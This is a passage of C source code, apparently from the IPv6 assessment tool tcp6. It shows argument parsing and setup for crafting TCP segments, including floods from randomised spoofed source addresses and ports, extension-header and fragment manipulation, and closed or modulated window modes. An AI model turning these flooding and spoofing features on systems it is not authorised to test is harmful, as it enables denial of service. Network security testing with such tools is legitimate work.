tcp_queue *, unsigned char *, unsigned int, unsigned char *, unsigned int); unsigned int queue_remove(struct tcp_queue *, unsigned char *, unsigned int); void queue_purge( struct tcp_queue *); int tcp_init(struct tcp *); int tcp_open(struct iface_data *, struct tcp *, unsigned int); int tcp_close(struct iface_data *, struct tcp *); int tcp_send(struct iface_data *, struct tcp *, unsigned char *, unsigned int); int tcp_receive(struct iface_data *, struct tcp *, unsigned char *, unsigned int); int tcp_input(struct iface_data *, struct tcp *, const u_char *, struct pcap_pkthdr *, struct packet *); int tcp_output(struct iface_data *, struct tcp *, struct packet *, struct timeval *); int is_valid_tcp_segment(struct iface_data *, const u_char *, struct pcap_pkthdr *); /* Flags */ unsigned char floodt_f=0; unsigned char listen_f=0, accepted_f=0, loop_f=0, sleep_f=0; unsigned char hoplimit_f=0, rand_link_src_f=0, rand_src_f=0; unsigned char floods_f=0, floodp_f=0, donesending_f=0, startclose_f=0; unsigned char data_f=0, senddata_f=0, useaddrkey_f=0, window_f=0, winmodulate_f=0; /* Flags used for TCP (specifically) */ unsigned char srcport_f=0, dstport_f=0; unsigned char tcpseq_f=0, tcpack_f=0, tcpurg_f=0, tcpflags_f=0, tcpwin_f=0; unsigned char rhbytes_f=0, tcpflags_auto_f=0, tcpopen_f=0, tcpclose_f=0; unsigned char pps_f=0, bps_f=0, probemode_f=0, retrans_f=0, rto_f=0; unsigned char ackdata_f=1, ackflags_f=1; unsigned int probemode, tcpopen=0, tcpclose=0, win1_size=0, win2_size=0, window=0, time1_len=0, time2_len=0; uint16_t srcport, dstport, tcpurg, tcpwin, tcpwinm; unsigned int retrans, rto; uint32_t tcpseq, tcpack; uint8_t tcpflags=0, pkt_tcp_flags; struct tcp_hdr *rhtcp; unsigned int rhbytes, currentsize, packetsize; /* Used for router discovery */ struct iface_data idata; /* Data structures for packets read from the wire */ struct pcap_pkthdr *pkthdr; const u_char *pktdata; unsigned char *pkt_end; struct ether_header *pkt_ether; struct nd_neighbor_solicit *pkt_ns; struct ip6_hdr *pkt_ipv6; struct tcp_hdr *pkt_tcp; struct in6_addr *pkt_ipv6addr; unsigned int pktbytes; bpf_u_int32 my_netmask; bpf_u_int32 my_ip; struct bpf_program pcap_filter; char dev[64], errbuf[PCAP_ERRBUF_SIZE]; unsigned char buffer[65556], buffrh[MIN_IPV6_HLEN + MIN_TCP_HLEN]; unsigned char *v6buffer, *ptr, *startofprefixes; char *pref; char data[DATA_BUFFER_LEN]; unsigned int datalen; char iface[IFACE_LENGTH]; char line[LINE_BUFFER_SIZE]; struct ip6_hdr *ipv6; struct tcp_hdr *tcp; struct ether_header *ethernet; struct nd_opt_tlla *tllaopt; struct in6_addr targetaddr, randprefix; struct ether_addr linkaddr[MAX_TLLA_OPTION]; unsigned int nlinkaddr=0, linkaddrs; char *lasts, *rpref; char *charptr; size_t nw; unsigned long ul_res, ul_val, rate; unsigned int i, j, startrand; unsigned int skip; unsigned int sources, nsources, ports, nports, nsleep; unsigned char randpreflen; uint16_t mask; uint8_t hoplimit; uint16_t addr_key; char plinkaddr[ETHER_ADDR_PLEN]; char psrcaddr[INET6_ADDRSTRLEN], pdstaddr[INET6_ADDRSTRLEN], pv6addr[INET6_ADDRSTRLEN]; /* Support for Extension Headers */ unsigned int dstopthdrs, dstoptuhdrs, hbhopthdrs; char hbhopthdr_f=0, dstoptuhdr_f=0, dstopthdr_f=0; unsigned char *dstopthdr[MAX_DST_OPT_HDR], *dstoptuhdr[MAX_DST_OPT_U_HDR]; unsigned char *hbhopthdr[MAX_HBH_OPT_HDR]; unsigned int dstopthdrlen[MAX_DST_OPT_HDR], dstoptuhdrlen[MAX_DST_OPT_U_HDR]; unsigned int hbhopthdrlen[MAX_HBH_OPT_HDR], m, pad; struct ip6_frag fraghdr, *fh; struct ip6_hdr *fipv6; unsigned char fragbuffer[ETHER_HDR_LEN+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD]; unsigned char *fragpart, *fptr, *fptrend, *ptrend, *ptrhdr, *ptrhdrend; unsigned int hdrlen, ndstopthdr=0, nhbhopthdr=0, ndstoptuhdr=0; unsigned int nfrags, fragsize; unsigned char *prev_nh, *startoffragment; struct filters filters; int main(int argc, char **argv){ extern char *optarg; char *endptr; /* Used by strtoul() */ fd_set sset, rset; /* fd_set wset, eset; */ int r, sel; struct timeval timeout, stimeout, curtime, lastprobe, wmtimeout; /*struct tcp tcb; */ /* unsigned char end_f=0, error_f; */ unsigned char end_f=0; unsigned long pktinterval=0; /*Add datasent=0*/ unsigned int retr=0; struct target_ipv6 targetipv6; static struct option longopts[] = { {"interface", required_argument, 0, 'i'}, {"src-address", required_argument, 0, 's'}, {"dst-address", required_argument, 0, 'd'}, {"hop-limit", required_argument, 0, 'A'}, {"open-mode", required_argument, 0, 'c'}, {"close-mode", required_argument, 0, 'C'}, {"data", required_argument, 0, 'Z'}, {"dst-opt-hdr", required_argument, 0, 'u'}, {"dst-opt-u-hdr", required_argument, 0, 'U'}, {"hbh-opt-hdr", required_argument, 0, 'H'}, {"frag-hdr", required_argument, 0, 'y'}, {"link-src-addr", required_argument, 0, 'S'}, {"link-dst-addr", required_argument, 0, 'D'}, {"payload-size", required_argument, 0, 'P'}, {"src-port", required_argument, 0, 'o'}, {"dst-port", required_argument, 0, 'a'}, {"tcp-flags", required_argument, 0, 'X'}, {"tcp-seq", required_argument, 0, 'q'}, {"tcp-ack", required_argument, 0, 'Q'}, {"tcp-urg", required_argument, 0, 'V'}, {"tcp-win", required_argument, 0, 'w'}, {"window-mode", required_argument, 0, 'W'}, {"win-modulation", required_argument, 0, 'M'}, {"not-ack-data", no_argument, 0, 'N'}, {"not-ack-flags", no_argument, 0, 'n'}, {"block-src-addr", required_argument, 0, 'j'}, {"block-dst-addr", required_argument, 0, 'k'}, {"block-link-src-addr", required_argument, 0, 'J'}, {"block-link-dst-addr", required_argument, 0, 'K'}, {"accept-src-addr", required_argument, 0, 'b'}, {"accept-dst-addr", required_argument, 0, 'g'}, {"accept-link-src-addr", required_argument, 0, 'B'}, {"accept-link-dst-addr", required_argument, 0, 'G'}, {"flood-sources", required_argument, 0, 'F'}, {"flood-ports", required_argument, 0, 'T'}, {"loop", no_argument, 0, 'l'}, {"rate-limit", required_argument, 0, 'r'}, {"sleep", required_argument, 0, 'z'}, {"listen", no_argument, 0, 'L'}, {"probe-mode", required_argument, 0, 'p'}, {"retrans", required_argument, 0, 'x'}, {"verbose", no_argument, 0, 'v'}, {"help", no_argument, 0, 'h'}, {0, 0, 0, 0 } }; char shortopts[]= "i:s:d:A:c:C:Z:u:U:H:y:S:D:P:o:a:X:q:Q:V:w:W:M:Nnj:k:J:K:b:g:B:G:F:T:lr:z:Lp:x:vh"; char option; if(argc<=1){ usage(); exit(EXIT_FAILURE); } hoplimit=255; pktinterval= 0; lastprobe.tv_sec= 0; lastprobe.tv_usec= 0; /* Initialize filters structure */ if(init_filters(&filters) == -1){ puts("Error initializing internal data structure"); exit(EXIT_FAILURE); } if(init_iface_data(&idata) == FAILURE){ puts("Error initializing internal data structure"); exit(EXIT_FAILURE); } while((r=getopt_long(argc, argv, shortopts, longopts, NULL)) != -1) { option= r; switch(option){ case 'i': /* Interface */ strncpy(idata.iface, optarg, IFACE_LENGTH-1); idata.iface[IFACE_LENGTH-1]=0; idata.ifindex= if_nametoindex(idata.iface); idata.iface_f=TRUE; break; case 's': /* IPv6 Source Address */ if(idata.srcaddr_f){ puts("Error: Multiple '-s' options have been specified"); exit(EXIT_FAILURE); } if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Error in Source Address"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &(idata.srcaddr)) <= 0){ puts("inet_pton(): Source Address not valid"); exit(EXIT_FAILURE); } idata.srcaddr_f = 1; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ idata.srcpreflen = atoi(charptr); if(idata.srcpreflen>128){ puts("Prefix length error in IPv6 Source Address"); exit(EXIT_FAILURE); } if(idata.srcpreflen == 64) useaddrkey_f= 1; sanitize_ipv6_prefix(&(idata.srcaddr), idata.srcpreflen); idata.srcprefix_f=1; } break; case 'd': /* IPv6 Destination Address */ strncpy( targetipv6.name, optarg, NI_MAXHOST); targetipv6.name[NI_MAXHOST-1]= 0; targetipv6.flags= AI_CANONNAME; if( (r=get_ipv6_target(&targetipv6)) != 0){ if(r < 0){ printf("Unknown Destination: %s\n", gai_strerror(targetipv6.res)); } else{ puts("Unknown Destination: No IPv6 address found for specified destination"); } exit(1); } idata.dstaddr= targetipv6.ip6; idata.dstaddr_f = 1; break; case 'A': /* Hop Limit */ hoplimit= atoi(optarg); hoplimit_f=1; break; case 'c': if(strncmp(optarg, "simultaneous", MAX_CMDLINE_OPT_LEN) == 0){ tcpopen= OPEN_SIMULTANEOUS; } else if(strncmp(optarg, "passive", MAX_CMDLINE_OPT_LEN) == 0){ tcpopen= OPEN_PASSIVE; } else if(strncmp(optarg, "abort", MAX_CMDLINE_OPT_LEN) == 0){ tcpopen= OPEN_ABORT; } else if(strncmp(optarg, "active", MAX_CMDLINE_OPT_LEN) == 0){ tcpopen= OPEN_ACTIVE; } else{ puts("Error: Unknown open mode in '-c' option"); exit(EXIT_FAILURE); } tcpopen_f=1; break; case 'C': if(strncmp(optarg, "simultaneous", MAX_CMDLINE_OPT_LEN) == 0){ tcpclose= CLOSE_SIMULTANEOUS; } else if(strncmp(optarg, "passive", MAX_CMDLINE_OPT_LEN) == 0){ tcpclose= CLOSE_PASSIVE; } else if(strncmp(optarg, "abort", MAX_CMDLINE_OPT_LEN) == 0){ tcpclose= CLOSE_ABORT; } else if(strncmp(optarg, "active", MAX_CMDLINE_OPT_LEN) == 0){ tcpclose= CLOSE_ACTIVE; } else if( strncmp(optarg, "fin-wait-1", MAX_CMDLINE_OPT_LEN) == 0 || \ strncmp(optarg, "FIN-WAIT-1", MAX_CMDLINE_OPT_LEN) == 0){ tcpclose= CLOSE_FIN_WAIT_1; } else if( strncmp(optarg, "fin-wait-2", MAX_CMDLINE_OPT_LEN) == 0 || \ strncmp(optarg, "FIN-WAIT-2", MAX_CMDLINE_OPT_LEN) == 0){ tcpclose= CLOSE_FIN_WAIT_2; } else if( strncmp(optarg, "last-ack", MAX_CMDLINE_OPT_LEN) == 0 || \ strncmp(optarg, "LAST-ACK", MAX_CMDLINE_OPT_LEN) == 0){ tcpclose= CLOSE_LAST_ACK; } else{ puts("Error: Unknown close option ('-C')"); exit(EXIT_FAILURE); } tcpclose_f=1; break; case 'Z': /* Data */ datalen= Strnlen(optarg, MAX_CMDLINE_OPT_LEN); if(datalen >= DATA_BUFFER_LEN) datalen= DATA_BUFFER_LEN-1; strncpy(data, optarg, DATA_BUFFER_LEN-1); data_f=1; break; case 'u': /* Destinations Options Header */ if(ndstopthdr >= MAX_DST_OPT_HDR){ puts("Too many Destination Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstopthdrlen[ndstopthdr]= hdrlen; if( (dstopthdr[ndstopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header"); exit(EXIT_FAILURE); } ptrhdr= dstopthdr[ndstopthdr] + 2; ptrhdrend= dstopthdr[ndstopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr= ptrhdr + pad; } *(dstopthdr[ndstopthdr]+1)= (hdrlen/8)-1; ndstopthdr++; dstopthdr_f=1; break; case 'U': /* Destination Options Header (Unfragmentable Part) */ if(ndstoptuhdr >= MAX_DST_OPT_U_HDR){ puts("Too many Destination Options Headers (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstoptuhdrlen[ndstoptuhdr]= hdrlen; if( (dstoptuhdr[ndstoptuhdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } ptrhdr= dstoptuhdr[ndstoptuhdr]+2; ptrhdrend= dstoptuhdr[ndstoptuhdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header (Unfragmentable Part) Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(dstoptuhdr[ndstoptuhdr]+1)= (hdrlen/8) - 1; ndstoptuhdr++; dstoptuhdr_f=1; break; case 'H': /* Hop-by-Hop Options Header */ if(nhbhopthdr >= MAX_HBH_OPT_HDR){ puts("Too many Hop-by-Hop Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; hbhopthdrlen[nhbhopthdr]= hdrlen; if( (hbhopthdr[nhbhopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } ptrhdr= hbhopthdr[nhbhopthdr] + 2; ptrhdrend= hbhopthdr[nhbhopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Hop-by-Hop Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(hbhopthdr[nhbhopthdr]+1)= (hdrlen/8) - 1; nhbhopthdr++; hbhopthdr_f=1; break; case 'y': /* Fragment header */ nfrags= atoi(optarg); if(nfrags < 8){ puts("Error in Fragmentation option: Fragment Size must be at least 8 bytes"); exit(EXIT_FAILURE); } nfrags = (nfrags +7) & 0xfff8; idata.fragh_f= 1; break; case 'S': /* Source Ethernet address */ if(ether_pton(optarg, &(idata.hsrcaddr), sizeof(idata.hsrcaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hsrcaddr_f = 1; break; case 'D': /* Destination Ethernet Address */ if(ether_pton(optarg, &(idata.hdstaddr), sizeof(idata.hdstaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hdstaddr_f = 1; break; case 'P': /* Payload Size*/ rhbytes= atoi(optarg); rhbytes_f= 1; break; case 'o': /* TCP Source Port */ srcport= atoi(optarg); srcport_f= 1; break; case 'a': /* TCP Destination Port */ dstport= atoi(optarg); dstport_f= 1; break; case 'X': if(strncmp(optarg, "auto", 4) == 0){ tcpflags_auto_f=1; break; } charptr = optarg; while(*charptr){ switch(*charptr){ case 'F': tcpflags= tcpflags | TH_FIN; break; case 'S': tcpflags= tcpflags | TH_SYN; break; case 'R': tcpflags= tcpflags | TH_RST; break; case 'P': tcpflags= tcpflags | TH_PUSH; break; case 'A': tcpflags= tcpflags | TH_ACK; break; case 'U': tcpflags= tcpflags | TH_URG; break; case 'X': /* No TCP flags */ break; default: printf("Unknown TCP flag '%c'\n", *charptr); exit(EXIT_FAILURE); break; } if(*charptr == 'X') break; charptr++; } tcpflags_f=1; break; case 'q': /* TCP Sequence Number */ if((ul_res = strtoul(optarg, &endptr, 0)) == ULONG_MAX){ perror("Error in 'TCP Sequence NUmber' parameter"); exit(EXIT_FAILURE); } if(endptr != optarg){ tcpseq = ul_res; tcpseq_f=1; } break; case 'Q': /* TCP Acknowledgement Number */ if((ul_res = strtoul(optarg, &endptr, 0)) == ULONG_MAX){ perror("Error in 'TCP Sequence NUmber' parameter"); exit(EXIT_FAILURE); } if(endptr != optarg){ tcpack = ul_res; tcpack_f=1; } break; case 'V': /* TCP Urgent Pointer */ tcpurg= atoi(optarg); tcpurg_f= 1; break; case 'w': /* TCP Window */ tcpwin= atoi(optarg); tcpwin_f=1; break; case 'W': /* TCP Window */ if(strncmp(optarg, "close", MAX_CMDLINE_OPT_LEN) == 0 || strncmp(optarg, "closed", MAX_CMDLINE_OPT_LEN) == 0){ window= WIN_CLOSED; } else if(strncmp(optarg, "modulate", MAX_CMDLINE_OPT_LEN) == 0 || strncmp(optarg, "modulation", MAX_CMDLINE_OPT_LEN) == 0){ window= WIN_MODULATE; } else{ puts("Error: Unknown window option ('-W')"); exit(EXIT_FAILURE); } window_f=1; break; case 'M': sscanf(optarg, "%u:%u:%u:%u", &win1_size, &time1_len, &win2_size, &time2_len); winmodulate_f= 1; break; case 'N': /* Do not ack data */ ackdata_f= 0; break; case 'n': /* Do not ack flags */ ackflags_f= 0; break; case 'j': /* IPv6 Source Address (block) filter */ if(filters.nblocksrc >= MAX_BLOCK_SRC){ puts("Too many IPv6 Source Address (block) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.blocksrc[filters.nblocksrc])) <= 0){ printf("Error in IPv6 Source Address (block) filter number %u.", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.blocksrclen[filters.nblocksrc] = 128; } else{ filters.blocksrclen[filters.nblocksrc] = atoi(charptr); if(filters.blocksrclen[filters.nblocksrc]>128){ printf("Length error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblocksrc+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.blocksrc[filters.nblocksrc]), filters.blocksrclen[filters.nblocksrc]); (filters.nblocksrc)++; break; case 'k': /* IPv6 Destination Address (block) filter */ if(filters.nblockdst >= MAX_BLOCK_DST){ puts("Too many IPv6 Destination Address (block) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Destination Address (block) filter number %u.\n", \ filters.nblockdst+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.blockdst[filters.nblockdst])) <= 0){ printf("Error in IPv6 Source Address (block) filter number %u.", \ filters.nblockdst+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.blockdstlen[filters.nblockdst] = 128; } else{ filters.blockdstlen[filters.nblockdst] = atoi(charptr); if(filters.blockdstlen[filters.nblockdst]>128){ printf("Length error in IPv6 Source Address (block) filter number %u.\n", \ filters.nblockdst+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.blockdst[filters.nblockdst]), filters.blockdstlen[filters.nblockdst]); (filters.nblockdst)++; break; case 'J': /* Link Source Address (block) filter */ if(filters.nblocklinksrc > MAX_BLOCK_LINK_SRC){ puts("Too many link-layer Source Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.blocklinksrc[filters.nblocklinksrc]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Source Address (blick) filter number %u.\n", \ filters.nblocklinksrc+1); exit(EXIT_FAILURE); } (filters.nblocklinksrc)++; break; case 'K': /* Link Destination Address (block) filter */ if(filters.nblocklinkdst > MAX_BLOCK_LINK_DST){ puts("Too many link-layer Destination Address (block) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.blocklinkdst[filters.nblocklinkdst]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Destination Address (blick) filter number %u.\n", \ filters.nblocklinkdst+1); exit(EXIT_FAILURE); } filters.nblocklinkdst++; break; case 'b': /* IPv6 Source Address (accept) filter */ if(filters.nacceptsrc > MAX_ACCEPT_SRC){ puts("Too many IPv6 Source Address (accept) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.acceptsrc[filters.nacceptsrc])) <= 0){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.acceptsrclen[filters.nacceptsrc] = 128; } else{ filters.acceptsrclen[filters.nacceptsrc] = atoi(charptr); if(filters.acceptsrclen[filters.nacceptsrc]>128){ printf("Length error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptsrc+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.acceptsrc[filters.nacceptsrc]), filters.acceptsrclen[filters.nacceptsrc]); (filters.nacceptsrc)++; filters.acceptfilters_f=1; break; case 'g': /* IPv6 Destination Address (accept) filter */ if(filters.nacceptdst > MAX_ACCEPT_DST){ puts("Too many IPv6 Destination Address (accept) filters."); exit(EXIT_FAILURE); } if((pref = strtok_r(optarg, "/", &lasts)) == NULL){ printf("Error in IPv6 Destination Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, pref, &(filters.acceptdst[filters.nacceptdst])) <= 0){ printf("Error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } if((charptr = strtok_r(NULL, " ", &lasts)) == NULL){ filters.acceptdstlen[filters.nacceptdst] = 128; } else{ filters.acceptdstlen[filters.nacceptdst] = atoi(charptr); if(filters.acceptdstlen[filters.nacceptdst] > 128){ printf("Length error in IPv6 Source Address (accept) filter number %u.\n", \ filters.nacceptdst+1); exit(EXIT_FAILURE); } } sanitize_ipv6_prefix(&(filters.acceptdst[filters.nacceptdst]), filters.acceptdstlen[filters.nacceptdst]); (filters.nacceptdst)++; filters.acceptfilters_f=1; break; case 'B': /* Link-layer Source Address (accept) filter */ if(filters.nacceptlinksrc > MAX_ACCEPT_LINK_SRC){ puts("Too many link-later Source Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.acceptlinksrc[filters.nacceptlinksrc]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Source Address (accept) filter number %u.\n", \ filters.nacceptlinksrc+1); exit(EXIT_FAILURE); } (filters.nacceptlinksrc)++; filters.acceptfilters_f=1; break; case 'G': /* Link Destination Address (accept) filter */ if(filters.nacceptlinkdst > MAX_ACCEPT_LINK_DST){ puts("Too many link-layer Destination Address (accept) filters."); exit(EXIT_FAILURE); } if(ether_pton(optarg, &(filters.acceptlinkdst[filters.nacceptlinkdst]), sizeof(struct ether_addr)) == 0){ printf("Error in link-layer Destination Address (accept) filter number %u.\n",\ filters.nacceptlinkdst+1); exit(EXIT_FAILURE); } (filters.nacceptlinkdst)++; filters.acceptfilters_f=1; break; case 'F': /* Flood source addresses */ nsources= atoi(optarg); if(nsources == 0){ puts("Invalid number of source addresses in option -F"); exit(EXIT_FAILURE); } floods_f= 1; break; case 'T': /* Flood source ports */ nports= atoi(optarg); if(nports == 0){ puts("Invalid number of source ports in option -T"); exit(EXIT_FAILURE); } floodp_f= 1; break; case 'l': /* "Loop mode */ loop_f = 1; break; case 'r': if( Strnlen(optarg, LINE_BUFFER_SIZE-1) >= (LINE_BUFFER_SIZE-1)){ puts("tcp6: -r option is too long"); exit(EXIT_FAILURE); } sscanf(optarg, "%lu%s", &rate, line); line[LINE_BUFFER_SIZE-1]=0; if(strncmp(line, "pps", 3) == 0) pps_f=1; else if(strncmp(line, "bps", 3) == 0) bps_f=1; else{ puts("tcp6: Unknown unit of for the rate limit ('-r' option). Unit should be 'bps' or 'pps'"); exit(EXIT_FAILURE); } break; case 'z': /* Sleep option */ nsleep=atoi(optarg); if(nsleep==0){ puts("Invalid number of seconds in '-z' option"); exit(EXIT_FAILURE); } sleep_f=1; break; case 'L': /* "Listen mode */ listen_f = 1; break; case 'p': /* Probe mode */ if(strncmp(optarg, "dump", MAX_CMDLINE_OPT_LEN) == 0){ probemode= PROBE_DUMP; } else if(strncmp(optarg, "script", MAX_CMDLINE_OPT_LEN) == 0){ probemode= PROBE_SCRIPT; } else{ puts("Error: Unknown open mode in '-Y' option"); exit(EXIT_FAILURE); } probemode_f=1; break; case 'x': /* Number of retrnasmissions */ retrans= atoi(optarg); retrans_f=1; break; case 'v': /* Be verbose */ (idata.verbose_f)++; break; case 'h': /* Help */ print_help(); exit(EXIT_FAILURE); break; default: usage(); exit(EXIT_FAILURE); break; } /* switch */ } /* while(getopt) */ if(geteuid()) { puts("tcp6 needs root privileges to run."); exit(EXIT_FAILURE); } srandom(time(NULL)); /* If the flood option ("-F") has been specified, but no prefix has been specified, assume a /64 prefix. */ if(floods_f && !idata.srcprefix_f){ idata.srcpreflen=64; } if(idata.srcprefix_f && !floods_f && loop_f){ floods_f=1; nsources= 1; } if(!(idata.dstaddr_f) && !listen_f){ /* Must specify IPv6 Destination Address if listening mode not used */ puts("IPv6 Destination Address not specified (and listening mode not selected)"); exit(EXIT_FAILURE); } if(rhbytes_f && data_f){ puts("Cannot set '--data' and '--payload-size' at the same time"); exit(EXIT_FAILURE); } if(!idata.iface_f){ if(idata.dstaddr_f && IN6_IS_ADDR_LINKLOCAL(&(idata.dstaddr))){ puts("Must specify a network interface for link-local destinations"); exit(EXIT_FAILURE); } else if(listen_f){ puts("Must specify a network interface when employing the 'listenging' mode"); exit(EXIT_FAILURE); } } if(load_dst_and_pcap(&idata, (idata.dstaddr_f?LOAD_SRC_NXT_HOP:LOAD_PCAP_ONLY)) == FAILURE){ puts("Error while learning Souce Address and Next Hop"); exit(EXIT_FAILURE); } release_privileges(); if(data_f){ data[datalen]=0; if(!string_escapes(data, &datalen, DATA_BUFFER_LEN-1)){ puts("Error in data string option ('-Z')"); exit(EXIT_FAILURE); } data[datalen]=0; } if(!floods_f) nsources=1; if(!floodp_f) nports=1; if(!sleep_f) nsleep=1; if(sleep_f && (pps_f || bps_f)){ puts("Cannot specify a rate-limit (-r) and a sleep time at the same time"); exit(EXIT_FAILURE); } if(pps_f && bps_f){ puts("Cannot specify a rate-limit in bps and pps at the same time"); exit(EXIT_FAILURE); } if(pps_f){ if(rate < 1) rate=1; pktinterval= 1000000/rate; } if(bps_f){ packetsize= MIN_IPV6_HLEN + sizeof(struct tcp_hdr) + rhbytes; for(i=0; i < ndstopthdr; i++) packetsize+= dstopthdrlen[i]; for(i=0; i < ndstoptuhdr; i++) packetsize+= dstoptuhdrlen[i]; for(i=0; i < nhbhopthdr; i++) packetsize+= hbhopthdrlen[i]; if(idata.fragh_f) packetsize+= sizeof(struct ip6_frag); if(rate == 0 || ((packetsize * 8)/rate) <= 0) pktinterval= 1000000; else pktinterval= ((packetsize * 8)/rate) * 1000000; } /* We Default to 1000 pps */ if(!pps_f && !bps_f) pktinterval= 1000; if( !idata.fragh_f && dstoptuhdr_f){ puts("Dst. Options Header (Unfragmentable Part) set, but Fragmentation not specified"); exit(EXIT_FAILURE); } /* * If we are going to send packets to a specified target, we must set some default values */ if(idata.dstaddr_f){ if(!tcpflags_auto_f && !tcpflags_f && !tcpopen_f && !tcpclose_f) tcpflags= tcpflags | TH_ACK; if(!tcpack_f) tcpack= random(); if(!tcpseq_f) tcpseq= random(); if(!srcport_f) srcport= random(); if(!dstport_f) dstport= random(); if(!tcpurg_f) tcpurg= 0; } /* By default, we randomize the TCP Window */ if(!tcpwin_f) tcpwin= ((uint16_t) random() + 1500) & (uint16_t)0x7f00; if(!rhbytes_f) rhbytes=0; if(idata.verbose_f){ print_attack_info(&idata); } /* Set filter for IPv6 packets (find_ipv6_router() set its own filter fore receiving RAs) */ if(pcap_compile(idata.pfd, &pcap_filter, PCAP_TCPIPV6_NS_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ printf("pcap_compile(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } if(pcap_setfilter(idata.pfd, &pcap_filter) == -1){ printf("pcap_setfilter(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } pcap_freecode(&pcap_filter); /* Set initial contents of the attack packet */ init_packet_data(&idata); addr_key= random(); if(sleep_f) pktinterval= (nsleep * 1000000)/(nsources * nports); timeout.tv_sec= pktinterval / 1000000; timeout.tv_usec= pktinterval % 1000000; stimeout= timeout; if(window_f){ if(window == WIN_MODULATE && !winmodulate_f){ win1_size= WIN_MODULATE_CLOSED_SIZE; time1_len= WIN_MODULATE_CLOSED_LEN; win2_size= WIN_MODULATE_OPEN_SIZE; time2_len= WIN_MODULATE_OPEN_LEN; } } if(window_f && window == WIN_MODULATE){ if(gettimeofday(&wmtimeout, NULL) == -1){ if(idata.verbose_f) perror("tcp6"); exit(EXIT_FAILURE); } tcpwinm= win1_size; } if(probemode_f){ end_f=0; if(!dstport_f) dstport= 80; if(!srcport_f) srcport= 50000 + random() % 15000; /* We select ports from the "high ports" range */ if(!rto_f) rto=1; if(!retrans_f) retrans=0; retr=0; retrans++; FD_ZERO(&sset); FD_SET(idata.fd, &sset); lastprobe.tv_sec= 0; lastprobe.tv_usec=0; while(!end_f){ if(gettimeofday(&curtime, NULL) == -1){ if(idata.verbose_f) perror("tcp6"); exit(EXIT_FAILURE); } if(is_time_elapsed(&curtime, &lastprobe, rto * 1000000) && retr < retrans){ retr++; lastprobe= curtime; send_packet(&idata, NULL, NULL); } if(is_time_elapsed(&curtime, &lastprobe, rto * 1000000) && retr >= retrans){ end_f=1; break; } rset= sset; timeout.tv_usec=0; 